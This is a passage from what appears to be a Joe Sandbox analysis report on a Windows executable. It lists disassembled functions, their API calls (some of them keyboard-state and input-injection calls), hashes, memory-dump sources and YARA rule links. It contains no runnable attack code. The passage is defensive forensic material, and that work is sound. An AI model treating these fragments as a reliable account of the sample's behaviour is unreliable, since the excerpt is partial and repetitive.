                                                                                                                                                    • Opcode Fuzzy Hash: e3179c2987a62733692ceab765edd20725f5b951b4ff8c35c0042417233c487f
                                                                                                                                                    • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                                                    Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove_strncmp
                                                                                                                                                    • String ID: >$U$\
                                                                                                                                                    • API String ID: 2666721431-237099441
                                                                                                                                                    • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                    • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                                                    • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                    • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                                                    Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2221674350-0
                                                                                                                                                    • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                    • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                                                    • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                    • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                                                    Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy$_wcscat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2037614760-0
                                                                                                                                                    • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                                                                                                    • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                                                    • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                                                                                                                    • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                                                    Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                    • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                                    • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                                    • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 960795272-0
                                                                                                                                                    • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                    • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                                                    • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                    • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                                                    Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4189319755-0
                                                                                                                                                    • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                    • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                                                    • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                    • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                                    Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                                                    • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1976402638-0
                                                                                                                                                    • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                    • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                                                    • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                    • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                                                    Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                    • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                    • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                                    • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                    • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                                    Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                    • API String ID: 2487901850-572801152
                                                                                                                                                    • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                    • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                                    • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                    • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                                    Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1871949834-0
                                                                                                                                                    • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                    • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                                    • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                    • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                                    Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                    • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                                    • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                    • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                                    Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                                    • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3611059338-0
                                                                                                                                                    • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                    • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                                                    • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                    • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                                                    Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1640429340-0
                                                                                                                                                    • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                    • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                                                    • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                    • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                                                    Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                    • _wcslen.LIBCMT ref: 004438CD
                                                                                                                                                    • _wcslen.LIBCMT ref: 004438E6
                                                                                                                                                    • _wcstok.LIBCMT ref: 004438F8
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044390C
                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                                                    • _wcstok.LIBCMT ref: 00443931
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
